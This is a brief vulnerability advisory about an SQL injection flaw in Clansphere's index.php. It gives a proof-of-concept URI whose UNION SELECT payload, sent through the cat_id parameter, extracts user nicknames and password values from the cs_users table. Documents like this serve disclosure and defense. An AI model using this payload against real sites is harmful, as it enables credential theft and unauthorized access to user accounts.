Clansphere index.php SQL Injection Vulnerability

Clansphere index.php SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,null%20FROM%20cs_users/*